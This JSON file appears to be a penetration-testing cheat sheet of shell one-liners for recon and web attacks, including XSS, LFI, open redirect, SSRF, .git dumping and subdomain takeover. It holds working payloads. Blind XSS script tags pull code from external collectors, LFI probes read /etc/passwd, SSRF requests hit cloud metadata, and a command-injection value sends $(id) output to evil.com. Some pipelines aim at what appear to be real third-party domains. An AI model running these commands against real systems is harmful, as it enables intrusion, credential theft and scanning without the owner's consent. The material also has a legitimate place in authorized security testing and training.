| [ |
| { |
| "category": "Additional Tools", |
| "description": "Additional tools are a set of supporting tools used to automate workflows, analyze results, and extend testing across multiple phases of penetration testing. These include tools for list manipulation (such as anew, uro, and unfurl), tools for rapid scanning (such as httpx-toolkit and dnsx), and tools specialized for specific tasks (such as arjun for parameters, kxss for XSS, and openredirex for redirection). They are typically used within pipelines to link tools together and filter results.", |
| "commands": [ |
| {"id": 1, "description": "HTML Content Filtering - Filter HTML content from discovered URLs", "command": "echo example.com | gau | grep -Eo '(\\/[^\\/]+)\\.(php|asp|aspx|jsp|jsf|cfm|pl|perl|cgi|htm|html)$' | httpx -status-code -mc 200 -content-type | grep -E 'text/html|application/xhtml+xml'"}, |
| {"id": 2, "description": "JavaScript Content Filtering - Filter JavaScript files from discovered URLs", "command": "echo example.com | gau | grep '\\.js$' | httpx -status-code -mc 200 -content-type | grep 'application/javascript'"}, |
| {"id": 3, "description": "Extract IP Addresses - Extract IP addresses from text files", "command": "grep -oE \"\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b\" file.txt"}, |
| {"id": 4, "description": "Process Amass Output - Process Amass output to extract clean domains", "command": "cat domains.txt | cut -d']' -f2 | awk '{print $2}' | tr ',' '\\n' | sort -u > amass.txt"}, |
| {"id": 5, "description": "Filter Dynamic Files - Filter URLs for dynamic files with parameters", "command": "cat urls.txt | grep -E \".php|.asp|.aspx|.jspx|.jsp\" | grep '=' | sort > output.txt"}, |
| {"id": 6, "description": "Clean Parameters - Clean parameter values from URLs", "command": "cat output.txt | sed 's/=.*/=/' > final.txt"}, |
| {"id": 7, "description": "URO Deduplication - Remove duplicate URLs using URO", "command": "cat urls.txt | uro | sort -u > deduplicated_urls.txt"}, |
| {"id": 8, "description": "QSReplace Parameter Testing - Replace parameter values with FUZZ for testing", "command": "cat urls.txt | qsreplace \"FUZZ\" | sort -u > fuzz_urls.txt"} |
| ] |
| }, |
| { |
| "category": "XSS Testing", |
| "description": "Cross-site scripting (XSS) testing is the process of discovering whether an application allows the injection of malicious JavaScript code into web pages, which could lead to session theft, account hijacking, or redirecting users to malicious websites. XSS is divided into three main types: stored, reflected, and DOM-based.", |
| "commands": [ |
| {"id": 1, "description": "Reflected XSS for Multiple Payload - Comprehensive reflected XSS testing with multiple payloads", "command": "subfinder -d \"example.com\" -all -recursive | httpx -mc 200 -silent | sed -E 's,https?://(www\\.)?,' | anew | urlfinder -all | iconv -f ISO-8859-1 -t UTF-8 -c | grep -aE '\\?.*=.*(&.*)?' | grep -aiEv \"\\.(css|ico|woff|woff2|svg|ttf|eot|png|jpg|jpeg|js|json|pdf|gif|xml|webp)($|\\s|\\?|&|#|/|\\.)\" | awk -F'[?&=]' '!seen[$1$2]++' | anew | rc -p \"RXSS\" -o rxss.txt"}, |
| {"id": 2, "description": "Blind XSS Oneliners - Blind XSS testing with specialized payloads", "command": "subfinder -d \"vulnweb.com\" -all -recursive | httpx -mc 200 -silent | sed -E 's,https?://(www\\.)?,' | anew | urlfinder -all | iconv -f ISO-8859-1 -t UTF-8 -c | grep -aE '\\?.*=.*(&.*)?' | anew > bxss.txt;xsser -f bxss.txt -p /home/haxshadow/Xss-payload/blindXss.txt"}, |
| {"id": 3, "description": "RXSS/BXSS Both finder - Comprehensive RXSS and BXSS detection pipeline", "command": "sudo mkdir -p --mode=777 all_xss/example.com/RXSS_BXSS;urlfinder -d \"example.com\" -all | iconv -f ISO-8859-1 -t UTF-8 -c | anew>all_xss/example.com/RXSS_BXSS/all_urls.txt"}, |
| {"id": 4, "description": "Final exploitation with Loxs tool", "command": "echo example.com | gau | gf xss | uro | Gxss | kxss | tee xss_output.txt"}, |
| {"id": 5, "description": "XSS Hunting from WaybackURLS", "command": "waybackurls wallet.tg | grep -E '\\bhttps?://\\S+?=\\S+' | grep -E '\\.php|\\.asp' | sort -u | sed 's/\\(=[^&]*\\)/=/g' | tee urls-xss.txt | sort -u -o urls-xss.txt && cat urls-xss.txt | kxss"}, |
| {"id": 6, "description": "XSS automation workflow with subfinder+httpx+katana+dalfox", "command": "subfinder -d example.com -o subdomains.txt && httpx -l subdomains.txt -o httpx.txt && echo \"example.com\" | gau --threads 5 >> Enpoints.txt && cat httpx.txt | katana -jc >> Enpoints.txt && cat Enpoints.txt | uro >> Endpoints_F.txt && cat Endpoints_F.txt | gf xss >> XSS.txt && cat XSS.txt | Gxss -p khXSS -o XSS_Ref.txt && dalfox file XSS_Ref.txt -o Vulnerable_XSS.txt"}, |
| {"id": 7, "description": "Poisoning the cache with XSS", "command": "curl -H \"User-Agent: tester\" -H \"hidden-header: </script><h2>TESTERING2333<img src=x onerror=alert(document.domain)>\" example.com"}, |
| {"id": 8, "description": "Find hidden parameters and potential XSS using Arjun + KXSS", "command": "arjun -q -u example.com arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, \"=\"); print baseUrl \"?\" param[1] \"=\"}}' | kxss"}, |
| {"id": 9, "description": "XSS is a hidden parameter in JavaScript", "command": "assetfinder example.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo \"var [a-zA-Z0-9]+\" | sed -e 's,var,\"$url\"?,g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e \"\\e[1;33m$url\\n\\e[1;32m$vars\"; done"}, |
| {"id": 16, "description": "Detect XSS vulnerabilities combining Arjun and kxss", "command": "arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, \"=\"); print baseUrl \"?\" param[1] \"=\"}}' | kxss"}, |
| {"id": 17, "description": "Head-based blind XSS testing", "command": "subfinder -d example.com | gau | bxss -payload ''><script src=https://xss.report/c/coffinxp></script>' -header 'X-Forwarded-For'"}, |
| {"id": 18, "description": "Check XSS on all URLs", "command": "echo 'example.com' | gau | qsreplace '<sCript>confirm(1)</sCript>' | xsschecker -match '<sCript>confirm(1)</sCript>' -vuln"}, |
| {"id": 19, "description": "Find blind XSS", "command": "subfinder -d example.com | gau | grep '&' | bxss -appendMode -payload ''><script src=https://xss.report/c/coffinxp></script>' -parameters"}, |
| {"id": 22, "description": "Automatically detect XSS across range of domains", "command": "subfinder -dL domainlist1.txt | dnsx | shuf | (gau | hakrawler) | anew | egrep -iv \"\\.(jpg|jpeg|gif|tif|tiff|png|ttf|woff|woff2|php|ico|pdf|svg|txt|js)$\" | urless | nilo | dalfox pipe -b https://xss.hunter/?q=1"} |
| ] |
| }, |
| { |
| "category": "LFI Testing", |
| "description": "Local File Inclusion Testing (LFI) is the process of discovering whether an application allows an attacker to read files from the server system via path parameters (such as page=, file=, path=). LFI can be exploited to read sensitive files (e.g., /etc/passwd, config.php) or execute code (via wrappers such as php://filter and php://input).", |
| "commands": [ |
| {"id": 1, "description": "Basic LFI Test - LFI testing with FFUF and passwd file detection", "command": "echo \"https://example.com/\" | gau | gf lfi | uro | sed 's/=.*/=/' | qsreplace \"FUZZ\" | sort -u | xargs -I{} ffuf -u {} -w payloads/lfi.txt -c -mr \"root:(x|\\*|\\$[^\\:]*):0:0:\" -v"}, |
| {"id": 2, "description": "LFI with Curl - LFI testing with curl and parallel processing", "command": "gau example.com | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'"}, |
| {"id": 3, "description": "HTTPx LFI Test - LFI testing with httpx", "command": "echo 'https://example.com/index.php?page=' | httpx -paths payloads/lfi.txt -threads 50 -random-agent -mc 200 -mr \"root:(x|\\*|\\$[^\\:]*):0:0:\""}, |
| {"id": 4, "description": "Fast LFI with waymore - changes user agent to bypass WAF", "command": "waymore -i \"testphp.vulnweb.com\" -n -mode U | gf lfi | sed 's/=.*/=/' | qsreplace \"FUZZ\" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr \"root:\" -v; done"}, |
| {"id": 5, "description": "curl manual testing using path traverse techniques", "command": "curl \"https://target.com/page?file=../../../../etc/passwd\""}, |
| {"id": 6, "description": "ffuf fuzzing using path traversal lists", "command": "ffuf -u \"https://target.com/page?file=FUZZ\" -w lfi-wordlist.txt"}, |
| {"id": 7, "description": "LFISuite - Automatically detect and exploit LFI", "command": "lfisuite.py -u \"https://target.com/page?file=value\""}, |
| {"id": 8, "description": "dotdotpwn - Generate path traversal payloads", "command": "dotdotpwn.pl -m http -u \"https://target.com/page?file=TRAVERSAL\""}, |
| {"id": 9, "description": "nuclei - Templates for detecting LFI", "command": "nuclei -u https://target.com -t ~/nuclei-templates/lfi/"} |
| ] |
| }, |
| { |
| "category": "Open Redirect", |
| "description": "Open redirect testing is the process of discovering whether an application allows users to be redirected to an external domain without proper verification of the destination link. This vulnerability can be exploited in phishing attacks or by bypassing security mechanisms by tricking a victim into clicking a link from a trusted site and then redirecting them to a malicious one.", |
| "commands": [ |
| {"id": 1, "description": "Find Redirect Parameters - Extract URLs with redirect parameters", "command": "cat urls.txt | grep -Pi \"returnUrl=|continue=|dest=|destination=|forward=|go=|goto=|next=|redirect=|redirect_to=|redirect_uri=|redirect_url=|return=|returnTo=|return_url=|url=\" | tee redirect_params.txt"}, |
| {"id": 2, "description": "GF Redirect Pattern - Use GF patterns to find redirect parameters", "command": "cat urls.txt | gf redirect | uro | sort -u | tee redirect_params.txt"}, |
| {"id": 3, "description": "Basic Open Redirect Test - Test redirect parameters with evil.com", "command": "cat redirect_params.txt | qsreplace \"https://evil.com\" | httpx -silent -fr -mr \"evil.com\""}, |
| {"id": 4, "description": "Comprehensive Redirect Test - Full pipeline for open redirect testing", "command": "subfinder -d example.com -all | httpx -silent | gau | gf redirect | uro | qsreplace \"https://evil.com\" | httpx -silent -fr -mr \"evil.com\""}, |
| {"id": 6, "description": "ffuf fuzzing to explore SSRF/redirect capabilities", "command": "ffuf -u https://target.com/api?url=FUZZ -w internal-ips.txt"}, |
| {"id": 7, "description": "curl manual testing via insertion of external domains", "command": "curl -i \"https://target.com/redirect?url=https://evil.com\""}, |
| {"id": 8, "description": "openredirex - Specialized tool for detecting open redirects", "command": "openredirex -u https://target.com -p \"url=\" -w payloads.txt"}, |
| {"id": 9, "description": "nuclei - Templates for rapid open redirect detection", "command": "nuclei -u https://target.com -t ~/nuclei-templates/open-redirect/"}, |
| {"id": 17, "description": "Automated sequential discovery of open redirect vulnerabilities", "command": "subfinder -d vulnweb.com -all | httpx-toolkit -silent | gau | gf redirect | uro | qsreplace \"https://evil.com\" | httpx-toolkit -silent -fr -mr \"evil.com\""}, |
| {"id": 20, "description": "Fuzzing with FFuF for open redirects", "command": "ffuf -w redirect_params.txt:PARAM -w loxs/payloads/or.txt:PAYLOAD -u \"https://site.com/bitrix/redirect.php?PARAM=PAYLOAD\" -mc 301,302,303,307,308 -t 10 -mr \"Location: http://google.com\""}, |
| {"id": 22, "description": "Nuclei Template for open redirect", "command": "echo subdomains.txt | nuclei -t openRedirect.yaml -c 30"} |
| ] |
| }, |
| { |
| "category": "SSRF Testing", |
| "description": "Server-side forgery (SSRF) testing is the process of discovering whether an application allows a server to make unrestricted requests to internal or external addresses. This vulnerability allows an attacker to exploit the server to access internal services (such as AWS metadata, Redis, databases) or bypass firewalls.", |
| "commands": [ |
| {"id": 1, "description": "Find SSRF Parameters - Identify URLs with SSRF-prone parameters", "command": "cat urls.txt | grep -E 'url=|uri=|redirect=|next=|data=|path=|dest=|proxy=|file=|img=|out=|continue=' | sort -u"}, |
| {"id": 2, "description": "Find API/Webhook Patterns - Find API endpoints and webhook integrations", "command": "cat urls.txt | grep -i 'webhook\\|callback\\|upload\\|fetch\\|import\\|api' | sort -u"}, |
| {"id": 3, "description": "Nuclei SSRF Scan - Automated SSRF vulnerability scanning", "command": "cat urls.txt | nuclei -t nuclei-templates/vulnerabilities/ssrf/"}, |
| {"id": 4, "description": "Basic SSRF Test - Basic SSRF test to localhost", "command": "curl \"https://example.com/page?url=http://127.0.0.1:80/\""}, |
| {"id": 5, "description": "Cloud Metadata SSRF - Test SSRF against cloud metadata services", "command": "curl \"https://example.com/api?endpoint=http://169.254.169.254/latest/meta-data/\""}, |
| {"id": 6, "description": "ffuf / Burp Intruder - Fuzzing for SSRF capabilities", "command": "ffuf -u https://target.com/api?url=FUZZ -w internal-ips.txt"}, |
| {"id": 7, "description": "SSRFmap - Automatically detect and exploit SSRF", "command": "ssrfmap -r request.txt -p url"}, |
| {"id": 8, "description": "nuclei - SSRF templates for rapid detection", "command": "nuclei -u https://target.com -t ~/nuclei-templates/ssrf/"}, |
| {"id": 9, "description": "SSRF to RCE via Open Redirect - Advanced SSRF with Payload Injection", "command": "curl -X POST http://target.com/api/v1/login -d \"username=admin&password=pass&redirect=http://evil.com$(id)\" -H \"X-Forwarded-Host: 169.254.169.254\" -I"} |
| ] |
| }, |
| { |
| "category": "Git Repository Disclosure", |
| "description": "Git Repository Disclosure is the exposure of a .git folder or version control metadata on a web server, allowing attackers to download the repository and access source code, configuration files, database credentials, or internal logic. This occurs when the web server does not block access to .git/ or misconfigures permissions.", |
| "commands": [ |
| {"id": 1, "description": "Git Directory Discovery - Detect exposed .git directories and directory listings", "command": "cat domains.txt | grep \"SUCCESS\" | gf urls | httpx -sc -server -cl -path \"/.git/\" -mc 200 -location -ms \"Index of\" -probe"}, |
| {"id": 2, "description": "git-dumper - Extract entire repository from publicly exposed .git folder", "command": "git-dumper https://target.com/.git/ ./output"}, |
| {"id": 3, "description": "wget/curl - Manually download .git files", "command": "wget -r https://target.com/.git/"}, |
| {"id": 4, "description": "gobuster/ffuf - Brute-force discovery of .git/", "command": "gobuster dir -u https://target.com -w wordlist.txt -x git"}, |
| {"id": 5, "description": "nmap script - http-git detects exposed git repositories", "command": "nmap -p80 --script http-git target.com"} |
| ] |
| }, |
| { |
| "category": "Subdomain Takeover", |
| "description": "Subdomain takeover testing is the process of discovering subdomains that point to external services (such as GitHub Pages, AWS S3, Heroku, etc.) and are no longer in use, allowing an attacker to adopt and control the domain. This occurs when DNS (CNAME) records point to a non-existent resource.", |
| "commands": [ |
| {"id": 1, "description": "Subdomain Takeover Detection - Automated subdomain takeover detection with SSL verification", "command": "subzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl"}, |
| {"id": 2, "description": "nuclei - With subdomain-takeover template for vulnerability detection", "command": "nuclei -l subdomains.txt -t ~/nuclei-templates/takeovers/"}, |
| {"id": 3, "description": "Hybrid Detection with AI-Powered Fingerprinting - Multi-tool takeover detection", "command": "subfinder -d http://target.com -silent | dnsgen - | massdns -r resolvers.txt -t A -o S | grep CNAME | tee cname.txt | subjack -w cname.txt -t 100 -ssl -v -c fingerprints.json -o takeovers.txt"} |
| ] |
| }, |
| { |
| "category": "CORS Testing", |
| "description": "CORS Testing is the process of verifying that a web application's Cross-Origin Resource Sharing (CORS) policy is correctly configured to prevent unauthorized cross-origin requests. Misconfigurations (e.g., Access-Control-Allow-Origin: * or reflecting arbitrary origins) can lead to data leakage, session hijacking, or CSRF attacks.", |
| "commands": [ |
| {"id": 1, "description": "CORS Test with Curl - Test CORS configuration with custom origin", "command": "curl -H \"Origin: http://example.com\" -I https://example.com/wp-json/"}, |
| {"id": 2, "description": "Detailed CORS Analysis - Analyze CORS headers in response", "command": "curl -H \"Origin: http://example.com\" -I https://example.com/wp-json/ | grep -i -e \"access-control-allow-origin\" -e \"access-control-allow-methods\" -e \"access-control-allow-credentials\""}, |
| {"id": 3, "description": "Nuclei CORS Test - Automated CORS vulnerability scanning with Nuclei", "command": "cat subdomains.txt | httpx -silent | nuclei -t nuclei-templates/vulnerabilities/cors/ -o cors_results.txt"} |
| ] |
| }, |
| { |
| "category": "WordPress Security Testing", |
| "description": "WordPress Security Testing is the process of assessing a WordPress website for misconfigurations, outdated components, weak credentials, and known vulnerabilities. It focuses on the unique architecture of WordPress: core, plugins, themes, and user roles.", |
| "commands": [ |
| {"id": 1, "description": "WPScan Full Enumeration - Comprehensive WordPress security scan with aggressive plugin detection", "command": "wpscan --url https://example.com --disable-tls-checks --api-token YOUR_API_TOKEN -e at -e ap -e u --enumerate ap --plugins-detection aggressive --force"}, |
| {"id": 2, "description": "wpscan - Detect version, vulnerabilities, plugins, themes, and users", "command": "wpscan --url https://target.com --enumerate vp,vt,u"}, |
| {"id": 3, "description": "gobuster + WordPress Lists - Blast extension and theme paths", "command": "gobuster dir -u https://target.com -w /usr/share/wordlists/wpscan/plugins.txt"}, |
| {"id": 4, "description": "ffuf + list - High flexibility in filtering with POST and headers support", "command": "ffuf -u https://target.com/wp-content/plugins/FUZZ/ -w /usr/share/seclists/Discovery/Web-Content/WordPress/plugins.fuzz.txt"}, |
| {"id": 5, "description": "nmap NSE scripts - Version counting, vulnerabilities, extension detection", "command": "nmap -p80,443 --script http-wordpress-* -sV target.com"}, |
| {"id": 6, "description": "curl manual - Direct verification of REST API points for user counts", "command": "curl -s https://target.com/wp-json/wp/v2/users"} |
| ] |
| }, |
| { |
| "category": "Directory & File Bruteforcing", |
| "description": "Directory & File Bruteforcing is the automated process of enumerating accessible directories and files on a web server by systematically testing thousands of common names, extensions, and patterns. It uncovers hidden endpoints, backup files, administrative interfaces, and developer artifacts that are not linked publicly.", |
| "commands": [ |
| {"id": 1, "description": "Dirsearch Basic - Basic directory and file discovery", "command": "dirsearch -u https://example.com --full-url --deep-recursive -r"}, |
| {"id": 2, "description": "Dirsearch Extended - Extended directory bruteforcing with multiple extensions", "command": "dirsearch -u https://example.com -e php,cgi,htm,html,js,txt,bak,zip,old,conf,log,asp,aspx,jsp,sql,db --random-agent --recursive -R 3 -t 20 --exclude-status=404 --follow-redirects --delay=0.1"}, |
| {"id": 3, "description": "FFUF Directory Discovery - FFUF directory discovery with recursion and multiple extensions", "command": "ffuf -w seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u https://example.com/FUZZ -fc 400,401,402,403,404,429,500,501,502,503 -recursion -recursion-depth 2 -e .html,.php,.txt,.pdf,.js,.css,.zip,.bak,.old,.log,.json,.xml,.config,.env -ac -c -t 10"}, |
| {"id": 5, "description": "ffuf LFI payload testing", "command": "ffuf -request lfi -request-proto https -w /root/wordlists/offensive\\ payloads/LFI\\ payload.txt -c -mr 'root:'"}, |
| {"id": 6, "description": "Dynamic Parameter Tampering - Fuzzing for API Parameter Manipulation", "command": "ffuf -u \"http://target.com/api/v1/resource?FUZZ=value\" -w /usr/share/wordlists/params.txt -mc 200,403 -t 100 -ac -H \"User-Agent: Mozilla/5.0\" -o tampered_params.txt"} |
| ] |
| }, |
| { |
| "category": "Hidden Parameter Discovery", |
| "description": "Hidden Parameter Discovery is the process of identifying undocumented or concealed HTTP parameters that may affect application behavior, expose security flaws, or unlock hidden functionality. Attackers and testers inject parameters not explicitly defined in forms or API documentation to discover injection points, bypass security controls, or trigger unintended logic.", |
| "commands": [ |
| {"id": 1, "description": "Arjun Passive Discovery - Passive parameter discovery using Arjun", "command": "arjun -u https://example.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers \"User-Agent: Mozilla/5.0\""}, |
| {"id": 2, "description": "Arjun Active Discovery - Active parameter discovery with wordlist", "command": "arjun -u https://example.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers \"User-Agent: Mozilla/5.0\""} |
| ] |
| }, |
| { |
| "category": "Sensitive File Discovery", |
| "description": "Sensitive File Discovery is the process of identifying exposed files on a target system that may contain credentials, configuration data, backup archives, or other confidential information. It often relies on wordlist-based fuzzing, directory brute-forcing, or analyzing public sources to locate files that were unintentionally left accessible.", |
| "commands": [ |
| {"id": 1, "description": "Basic Sensitive Files - Filter URLs for common sensitive file extensions", "command": "cat allurls.txt | grep -E \"\\.xls|\\.xml|\\.xlsx|\\.json|\\.pdf|\\.sql|\\.doc|\\.docx|\\.pptx|\\.txt|\\.zip|\\.tar\\.gz|\\.tgz|\\.bak|\\.7z|\\.rar|\\.log|\\.cache|\\.secret|\\.db|\\.backup|\\.yml|\\.gz|\\.config|\\.csv|\\.yaml|\\.md|\\.md5\""}, |
| {"id": 2, "description": "Extended Sensitive Files - Extended regex for sensitive file discovery", "command": "cat allurls.txt | grep -E \"\\.(xls|xml|xlsx|json|pdf|sql|doc|docx|pptx|txt|zip|tar\\.gz|tgz|bak|7z|rar|log|cache|secret|db|backup|yml|gz|config|csv|yaml|md|md5|tar|xz|p12|pem|key|crt|sh|py|java|env|ini|conf|properties|cfg)$\""}, |
| {"id": 3, "description": "Google Dork for Files - Google search for sensitive files", "command": "site:*.example.com (ext:doc OR ext:docx OR ext:pdf OR ext:rtf OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:log OR ext:bak OR ext:conf OR ext:sql)"} |
| ] |
| }, |
| { |
| "category": "Vulnerability Scanning", |
| "description": "Vulnerability Scanning is the automated process of identifying known weaknesses, misconfigurations, and missing patches in target systems or applications. It follows host discovery and URL collection to detect potential entry points before manual exploitation.", |
| "commands": [ |
| {"id": 1, "description": "Nuclei Single Target - Run Nuclei templates against single target", "command": "nuclei -u https://example.com -bs 50 -c 30"}, |
| {"id": 2, "description": "Nuclei Multiple Targets - Run Nuclei templates against multiple targets", "command": "nuclei -l live_domains.txt -bs 50 -c 30"}, |
| {"id": 3, "description": "Nuclei with Specific Severity - Run only critical and high severity templates", "command": "nuclei -l live_domains.txt -s critical,high -bs 50 -c 30"} |
| ] |
| }, |
| { |
| "category": "URL Collection & Analysis", |
| "description": "URL Collection & Analysis is the process of gathering and examining URLs associated with a target to discover web endpoints, parameters, hidden paths, and exposed resources. It is a crucial phase in web reconnaissance, used to map the attack surface, identify entry points, and collect intelligence for further testing.", |
| "commands": [ |
| {"id": 1, "description": "Katana - Fast web crawler for URL discovery", "command": "katana -u livesubdomains.txt -d 2 -o urls.txt"}, |
| {"id": 2, "description": "Hakrawler - Simple, fast web crawler", "command": "cat urls.txt | hakrawler -u > urls3.txt"}, |
| {"id": 3, "description": "GAU (Get All URLs) - Fetch known URLs from AlienVault OTX, Wayback Machine, and Common Crawl", "command": "cat livesubdomains.txt | gau | sort -u > urls2.txt"}, |
| {"id": 4, "description": "URLFinder - Find URLs from various sources", "command": "urlfinder -d example.com | sort -u > urls3.txt"}, |
| {"id": 5, "description": "GAU with Status Filter - Get URLs with 200 status code and deduplicate", "command": "echo example.com | gau --mc 200 | urldedupe > urls.txt"}, |
| {"id": 6, "description": "Extract URLs with Parameters - Extract URLs containing parameters", "command": "cat allurls.txt | grep '=' | urldedupe | tee output.txt"}, |
| {"id": 7, "description": "Parameter Pattern Matching - Extract URLs with parameter patterns", "command": "cat allurls.txt | grep -E '\\?[^=]+=.+$' | tee output.txt"}, |
| {"id": 8, "description": "GF SQLi Pattern - Filter URLs potentially vulnerable to SQL injection", "command": "cat allurls.txt | gf sqli"} |
| ] |
| }, |
| { |
| "category": "Live Host Discovery", |
| "description": "Live Host Discovery is the process of identifying active (alive) hosts on a network by sending probes (e.g., ICMP, ARP, TCP, UDP) and analyzing responses. It is the first phase of network penetration testing and enumeration, used to map live systems before deeper scanning.", |
| "commands": [ |
| {"id": 1, "description": "HTTPX Basic - Probe for live hosts on multiple ports", "command": "cat subdomain.txt | httpx -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt"}, |
| {"id": 2, "description": "HTTPX with Status Codes - Probe with detailed information extraction", "command": "cat subdomain.txt | httpx -sc -title -server -td -ports 80,443,8080,8000,8888 -threads 200"}, |
| {"id": 3, "description": "Aquatone Basic - Take screenshots of live hosts", "command": "cat hosts.txt | aquatone"}, |
| {"id": 4, "description": "Aquatone Custom Ports - Screenshot with custom port list", "command": "cat hosts.txt | aquatone -ports 80,443,8000,8080,8443"}, |
| {"id": 5, "description": "Aquatone Extended Ports - Screenshot with extended port range", "command": "cat hosts.txt | aquatone -ports 80,81,443,591,2082,2087,2095,2096,3000,8000,8001,8008,8080,8083,8443,8834,8888"} |
| ] |
| }, |
| { |
| "category": "Subdomain Enumeration", |
| "description": "Subdomain Enumeration is the process of extracting subdomains associated with a target domain using automated tools, OSINT, DNS bruting, and public sources. It is a foundational recon step that expands the attack surface for further testing.", |
| "commands": [ |
| {"id": 1, "description": "Subfinder - Fast subdomain discovery using multiple data sources", "command": "subfinder -d example.com -all -recursive -o subfinder.txt"}, |
| {"id": 2, "description": "Assetfinder - Find domains and subdomains associated with a given domain", "command": "assetfinder --subs-only example.com > assetfinder.txt"}, |
| {"id": 3, "description": "Sublist3r - Subdomain enumeration using OSINT techniques", "command": "sublist3r -d example.com -e baidu,yahoo,google,bing,ask,netcraft,virustotal,threatcrowd,crtsh,passivedns -v -o sublist3r.txt"}, |
| {"id": 4, "description": "Amass - In-depth attack surface mapping and external asset discovery", "command": "amass enum -passive -d example.com | cut -d']' -f 2 | awk '{print $1}' | sort -u > amass.txt"}, |
| {"id": 5, "description": "Certificate Transparency - Find subdomains from SSL certificate transparency logs", "command": "curl -s https://crt.sh\\?q\\=\\example.com\\&output\\=json | jq -r '.[].name_value' | grep -Po '(\\w+\\.\\w+\\.\\w+)$' >crtsh.txt"}, |
| {"id": 6, "description": "Wayback Machine - Historical subdomain discovery from web archives", "command": "curl -s \"http://web.archive.org/cdx/search/cdx?url=*.example.com/*&output=text&fl=original&collapse=urlkey\" |sort| sed -e 's_https*://__' -e \"s/\\/.*//' -e 's/:.*//' -e 's/^www\\.//' | sort -u > wayback.txt"}, |
| {"id": 7, "description": "Merge & Deduplicate - Combine and remove duplicate subdomains", "command": "cat *.txt | sort -u > final.txt"}, |
| {"id": 8, "description": "FFUF Subdomain Bruteforce - Brute force subdomain discovery using wordlists", "command": "ffuf -u \"https://FUZZ.example.com\" -w wordlist.txt -mc 200,301,302"}, |
| {"id": 9, "description": "Subdomain Permutation - Generate subdomain permutations and resolve them", "command": "subfinder -d example.com | alterx | dnsx"}, |
| {"id": 10, "description": "Alterx Enrichment - Enrich domain with common patterns", "command": "echo example.com | alterx -enrich | dnsx"}, |
| {"id": 11, "description": "Alterx with Wordlist - Use wordlist for subdomain permutation", "command": "echo example.com | alterx -pp word=/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | dnsx"}, |
| {"id": 12, "description": "Hybrid Recon with Multi-Tool Subdomain Discovery and Dynamic Correlation", "command": "subfinder -d walletbot.me -silent; amass enum -passive -d http://imamhussain.org -silent; assetfinder --subs-only http://imamhussain.org) | anew | sort -u | dnsx -a -resp -o resolved.txt | httpx -silent -title -tech-detect -status-code -o httpx_results.txt"}, |
| {"id": 13, "description": "Filter direct subdomains", "command": "cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt"}, |
| {"id": 14, "description": "Fetch negative URLs with katana", "command": "katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt"} |
| ] |
| } |
| ] |
|
|
